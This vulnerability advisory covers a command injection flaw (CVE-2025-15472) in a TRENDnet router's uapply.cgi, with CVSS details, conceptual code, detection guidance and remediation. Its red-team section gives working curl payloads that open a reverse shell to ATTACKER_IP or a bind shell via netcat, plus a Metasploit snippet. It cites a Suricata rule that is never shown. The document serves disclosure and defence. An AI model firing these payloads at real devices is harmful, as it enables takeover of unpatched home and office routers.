CVE-2025-15472
Executive Summary
CVE-2025-15472 is a critical OS command injection vulnerability in the TRENDnet TEW-811DRU router, specifically in firmware version 1.0.2.0. The flaw resides in the setDeviceURL function within the uapply.cgi CGI binary of the httpd component. By manipulating the DeviceURL parameter, an unauthenticated remote attacker can inject arbitrary operating system commands, leading to full device compromise. The exploit has been publicly released, and the vendor has not responded to disclosure attempts, leaving the device in an unpatched state. This vulnerability poses a severe risk to home and small office networks, as it allows an attacker to pivot into internal networks, exfiltrate data, or deploy malware.

CVSS Breakdown & Threat Level
- CVSS Score: 10.0 (Critical)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Network – The vulnerability is exploitable remotely over the network.
- Attack Complexity (AC): Low – No special conditions or race conditions are required.
- Privileges Required (PR): None – No authentication is needed.
- User Interaction (UI): None – The victim does not need to perform any action.
- Scope (S): Unchanged – The vulnerable component and the impacted component are the same.
- Confidentiality (C): High – Full read access to the device filesystem and network traffic.
- Integrity (I): High – Full write access to the device filesystem and configuration.
- Availability (A): High – An attacker can crash the device or disrupt network services.
Threat Level: Critical. The combination of remote exploitability, no authentication, and public exploit code makes this a high-priority threat for any organization using the affected device.
Deep Dive & Mechanics
The vulnerability is a classic OS command injection in the uapply.cgi CGI script. The setDeviceURL function is intended to configure a device URL parameter, likely for remote management or update services. However, the input from the DeviceURL POST parameter is passed unsanitized to a system shell command (e.g., system(), popen(), or exec()).
Root Cause: The CGI binary does not validate or sanitize the DeviceURL parameter before concatenating it into a shell command string. For example, the backend code might execute something like:
snprintf(cmd, sizeof(cmd), "wget -O /tmp/update %s", device_url);
system(cmd);
An attacker can inject command separators such as ;, |, &&, or backticks to execute arbitrary commands.
Attack Flow:
- The attacker sends a crafted HTTP POST request to
http://<router_ip>/uapply.cgiwith a maliciousDeviceURLparameter. - The CGI script processes the parameter and passes it to a shell command.
- The injected command executes with the privileges of the
httpdprocess (typically root on embedded devices). - The attacker gains a reverse shell, installs malware, or exfiltrates data.
Affected Component: httpd – the embedded web server handling the management interface.
Vulnerable vs. Patched Code
Since no patch is available, the vulnerable code is the only reference. A secure implementation would use parameterized APIs or strict input validation.
Vulnerable Code (Conceptual):
void setDeviceURL(char *device_url) {
char cmd[512];
snprintf(cmd, sizeof(cmd), "wget -O /tmp/update %s", device_url);
system(cmd);
}
Patched Code (Conceptual):
void setDeviceURL(char *device_url) {
// Validate input: only allow alphanumeric, dots, and slashes
if (!isValidURL(device_url)) {
return;
}
// Use execve with separate arguments to avoid shell injection
char *args[] = {"/usr/bin/wget", "-O", "/tmp/update", device_url, NULL};
execve(args[0], args, NULL);
}
Exploitation & Lab Setup
Red Team (Offensive)
Lab Setup:
- Target: TRENDnet TEW-811DRU with firmware 1.0.2.0 (or emulated via QEMU/FirmAE).
- Attacker: Kali Linux with
curlandnetcat.
Exploit Command:
# Reverse shell payload (replace ATTACKER_IP and PORT)
curl -X POST http://<router_ip>/uapply.cgi \
--data-urlencode "DeviceURL=;nc -e /bin/sh ATTACKER_IP PORT;"
Alternative Payload (Bind Shell):
curl -X POST http://<router_ip>/uapply.cgi \
--data-urlencode "DeviceURL=;nc -lvp 4444 -e /bin/sh;"
Metasploit Module (if available):
use exploit/linux/http/trendnet_tew811dru_cmd_inject
set RHOSTS <router_ip>
set PAYLOAD cmd/unix/reverse_netcat
set LHOST <attacker_ip>
set LPORT 4444

Blue Team (Defensive)
Detection:
- Monitor HTTP POST requests to
/uapply.cgiwith suspiciousDeviceURLparameters containing shell metacharacters (;,|,&,`). - Alert on outbound connections from the router to unknown IPs on non-standard ports (e.g., 4444, 31337).
- Use network segmentation to isolate IoT devices from critical assets.
Honeypot:
- Deploy a low-interaction honeypot mimicking the TEW-811DRU web interface to capture exploitation attempts.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Network | POST /uapply.cgi with DeviceURL containing ; or ` |

| Network | Outbound connection from router to ATTACKER_IP:PORT |

| File | /tmp/update (malicious payload) |
Dropped by exploit |
| Process | nc -e /bin/sh or bash -i >& /dev/tcp/... |

Remediation & Mitigation
Immediate Actions:
- Isolate the device: Place the TEW-811DRU on a separate VLAN with no internet access or access to critical internal systems.
- Disable remote management: If not required, disable the web management interface from the WAN side.
- Monitor logs: Enable logging on the router and monitor for exploitation attempts.
Long-Term Solutions:
- Replace the device: Since the vendor is unresponsive, the only secure option is to replace the router with a supported model from a vendor that provides security patches.
- Firewall rules: Block inbound HTTP traffic to the router's management interface from untrusted networks.
- IDS/IPS: Deploy the Suricata rule above to detect and block exploitation attempts.
Vendor Contact: Attempt to contact TRENDnet via their security contact form. If no response, consider reporting to CERT/CC for broader disclosure.
